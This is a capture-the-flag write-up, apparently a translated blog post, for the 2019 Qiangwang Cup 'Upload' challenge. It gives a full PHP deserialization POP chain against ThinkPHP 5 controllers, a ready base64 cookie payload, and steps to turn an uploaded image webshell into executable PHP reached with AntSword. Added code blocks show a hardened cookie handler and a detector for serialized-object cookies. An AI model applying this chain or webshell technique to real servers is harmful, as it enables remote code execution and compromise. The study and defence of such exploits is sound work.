Qiangwang Cup 2019 (强网杯, QWB CTF): Upload
2022-07-27 04:54:00 【Hu'Ting】
A word up front: this challenge really stacks the layers, doesn't it?
File upload + deserialization
The opening page is the familiar register/login page.
Register and log in. We are given a file upload endpoint: upload an image webshell (图片马) and view its path.

Challenges like this usually involve a source-code leak, sometimes combined with SQL injection, sometimes with deserialization.
Directory scan with dirsearch
Installing dirsearch on Kali is covered in detail in another note and is not repeated here.
Open a terminal in the dirsearch directory and run:
python3 dirsearch.py -u URL -e* -t 20 -x 301,403,429,404,500,501
Explanation:
-e* scan for all script types
-t 20 set the number of scanning threads to 20
-x 301,403,429,404,500,501 exclude the listed HTTP status codes, separated by commas
Leaked backend source code usually comes back with status code 200.
In the web root the scan found www.tar.gz.
Download it (the file is fairly large).

ThinkPHP framework
Open it in VS Code: it is ThinkPHP 5 (tp5), and there is also a .idea directory.
.idea stores the project's configuration information, including history and version-control information.
Confirmed to be the ThinkPHP framework; the core code is generally under
application -> web -> controller
There are four PHP files here.


Deserialization
Here we see that the user cookie is passed through a deserialization operation.
First, most pages call the login_check method when visited; it first deserializes the incoming user profile, then checks whether the related information matches the database.
Register.php: in the destructor, if registed is not set, index() is called directly, i.e. it jumps to the home page.


Profile.php has two magic methods, __call and __get, which define what happens when a non-existent method or an inaccessible member variable is accessed. __get reads directly from except; __call looks up the member variable named after the called method, and then calls the method whose name is stored in that variable.
Both magic methods can be used.

Uploading a png directly has no effect. If an image webshell with another extension is uploaded it gets processed, and the extension is forcibly changed to png.

Our idea: use filename_tmp and filename to get the image webshell parsed as a php file. How do we get it parsed? The cookie is deserialized, so we can finish constructing the exp, serialize and encode it, and pass it in via the cookie; revisiting the png will then turn it into a php file, and we connect with AntSword. As for the specific construction: we can enter the following logic, which has filename and filename_tmp and can also use img.

But we need to bypass the two checks above; as long as those variables are not assigned, i.e. we simply do not set them, we pass.

Using __get and __call: except = ['index'=>'img'] (an array) makes a call to index resolve to the img variable. The img logic only requires that ext exists, because update_img() is called afterwards. So we set the img variable to the string 'upload_img', which triggers __call; that is exactly what these three pieces of logic do, and the call succeeds.


How do we call index? Set registed=false, i.e. if registed is not present we enter the logic of the destructor.
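The cookie check described above is the root cause: user input goes straight into unserialize(), so the Register and Profile objects and their magic methods run on the server's behalf. The following PHP is added here as an example, not code from the challenge source or the original writeup; it shows that pattern beside a hardened one that signs a JSON profile with an HMAC, with helper names and the secret as placeholders.

```php
<?php
// Added example, not code from the original writeup: the cookie handling that
// makes the chain above possible, next to a hardened version. The helper names
// (readProfileVulnerable, issueProfile, readProfile) are made up for this demo.
namespace app\web\controller;

// Vulnerable pattern: the cookie is base64(serialize(...)), so any class the
// autoloader can find (Register, Profile, ...) is instantiated from attacker
// input and its __destruct/__call/__get run before login_check compares anything.
function readProfileVulnerable(string $cookie)
{
    return unserialize(base64_decode($cookie));
}

// Hardened: the profile is JSON (no objects, so no magic methods) and carries an
// HMAC, so a tampered or forged cookie is rejected before it is even parsed.
const PROFILE_KEY = 'replace-with-a-random-32-byte-secret'; // placeholder secret
function issueProfile(array $profile): string
{
    $payload = base64_encode(json_encode($profile));
    return $payload . '.' . hash_hmac('sha256', $payload, PROFILE_KEY);
}

function readProfile(string $cookie): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    // Constant-time comparison, so the MAC cannot be guessed byte by byte.
    if (!hash_equals(hash_hmac('sha256', $payload, PROFILE_KEY), $mac)) {
        return null;
    }
    $raw = base64_decode($payload, true);
    $profile = $raw === false ? null : json_decode($raw, true);
    return is_array($profile) ? $profile : null;
}

// If legacy code must keep unserialize(), at least forbid object creation:
// objects become __PHP_Incomplete_Class, whose magic methods never run.
function readProfileLegacy(string $cookie)
{
    return unserialize(base64_decode($cookie), ['allowed_classes' => false]);
}

$good = issueProfile(['username' => 'alice', 'registed' => true]); // constructed
var_dump(readProfile($good)['username']);  // valid cookie: the profile is returned
var_dump(readProfile($good . 'x'));        // tampered MAC: the cookie is rejected
```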

Now we can basically construct the exp.
exp construction
Note that in the ThinkPHP framework you must specify the namespace, otherwise it is not known which class to instantiate.
<?php
namespace app\web\controller; // specify the namespace so the framework resolves the right class
class Profile{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;
    public function __get($name)
    {
        return $this->except[$name]; // except is an array, so the passed-in name is looked up in it
    }
    public function __call($name, $arguments)
    {
        // the undefined method name is read as a property; its value names the method to call
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }
}
class Register{
    public $checker;
    public $registed;
    public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index(); // not registered: index() on checker (a Profile) triggers __call
        }
    }
}
$profile=new Profile();
$profile->except=array('index'=>'img'); // ['index'=>'img'] is another way to write the array
$profile->img='upload_img';
$profile->filename_tmp='../upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.png';
$profile->filename='../upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.php';
$profile->ext=true;
$register=new Register();
$register->registed=false;
$register->checker=$profile;
$register->checker->checker=0; // keeps the pop chain from exiting the program
echo urlencode(base64_encode(serialize($register)));
Output:
TzoyNzoiYXBwXHdlYlxjb250cm9sbGVyXFJlZ2lzdGVyIjoyOntzOjc6ImNoZWNrZXIiO086MjY6ImFwcFx3ZWJcY29udHJvbGxlclxQcm9maWxlIjo3OntzOjc6ImNoZWNrZXIiO2k6MDtzOjEyOiJmaWxlbmFtZV90bXAiO3M6Nzk6Ii4uL3VwbG9hZC9jNDdiMjFmY2Y4ZjBiYzhiMzkyMDU0MWFiZDgwMjRmZC80YTQ3YTBkYjZlNjA4NTNkZWRmY2ZkZjA4YTVjYTI0OS5wbmciO3M6ODoiZmlsZW5hbWUiO3M6Nzk6Ii4uL3VwbG9hZC9jNDdiMjFmY2Y4ZjBiYzhiMzkyMDU0MWFiZDgwMjRmZC80YTQ3YTBkYjZlNjA4NTNkZWRmY2ZkZjA4YTVjYTI0OS5waHAiO3M6MTE6InVwbG9hZF9tZW51IjtOO3M6MzoiZXh0IjtiOjE7czozOiJpbWciO3M6MTA6InVwbG9hZF9pbWciO3M6NjoiZXhjZXB0IjthOjE6e3M6NToiaW5kZXgiO3M6MzoiaW1nIjt9fXM6ODoicmVnaXN0ZWQiO2I6MDt9
base64-decoded:
O:27:"app\web\controller\Register":2:{s:7:"checker";O:26:"app\web\controller\Profile":7:{s:7:"checker";i:0;s:12:"filename_tmp";s:79:"../upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.png";s:8:"filename";s:79:"../upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.php";s:11:"upload_menu";N;s:3:"ext";b:1;s:3:"img";s:10:"upload_img";s:6:"except";a:1:{s:5:"index";s:3:"img";}}s:8:"registed";b:0;}
OK, very good. How embarrassing.
Getting the flag
Set the user cookie to the encoded result of the script, refresh the root directory a few times, then revisit /upload/c47b21fcf8f0bc8b3920541abd8024fd/4a47a0db6e60853dedfcfdf08a5ca249.php; it has been parsed as a php file. Then connect with AntSword.
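For the defensive side, the cookie set in this step has a recognisable shape once decoded: base64 wrapping a PHP object graph that starts with O:<len>:"class". The PHP below is added here as an example and is not part of the original writeup; it scans cookie values for that shape and reports the class names that would be instantiated, using constructed sample cookies.

```php
<?php
// Added example, not from the original writeup: a defender-side check that flags
// cookie values carrying base64-wrapped PHP serialized objects, the shape of the
// payload produced by the exp above. The sample cookies below are constructed.

// O:<len>:"<class>" opens an object; C: is the legacy Serializable form.
function looksLikeSerializedObject(string $raw): bool
{
    return (bool) preg_match('/(^|[{;])[OC]:\d+:"/', $raw);
}

// Collect every class name that appears in an O: record, outermost first.
function objectClasses(string $raw): array
{
    preg_match_all('/O:\d+:"([^"]+)"/', $raw, $m);
    return array_values(array_unique($m[1]));
}

// Returns null for a harmless cookie, or the cookie name and the classes it
// would instantiate if it reached unserialize(). rawurldecode keeps '+' intact.
function inspectCookie(string $name, string $value): ?array
{
    $decoded = base64_decode(rawurldecode($value), true); // strict: garbage -> false
    if ($decoded === false || !looksLikeSerializedObject($decoded)) {
        return null;
    }
    return ['cookie' => $name, 'classes' => objectClasses($decoded)];
}

// Constructed samples: a harmless JSON cookie and one carrying an object graph
// whose class names match the writeup's chain (properties trimmed for brevity).
$samples = [
    'session' => base64_encode('{"user":"alice"}'),
    'user'    => base64_encode('O:27:"app\web\controller\Register":2:{s:7:"checker";'
               . 'O:26:"app\web\controller\Profile":0:{}s:8:"registed";b:0;}'),
];
foreach ($samples as $name => $value) {
    $hit = inspectCookie($name, $value);
    echo $hit === null
        ? "$name: no serialized object\n"
        : "$name: would instantiate " . implode(', ', $hit['classes']) . "\n";
}
```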
Afterword:
When I actually tried it, for some reason it could not be parsed into a php file; the file did not exist at all, a system error was also shown, and I could not even get back to the original login page. I will just record this stack of buffs here. Qiangwang Cup, strong!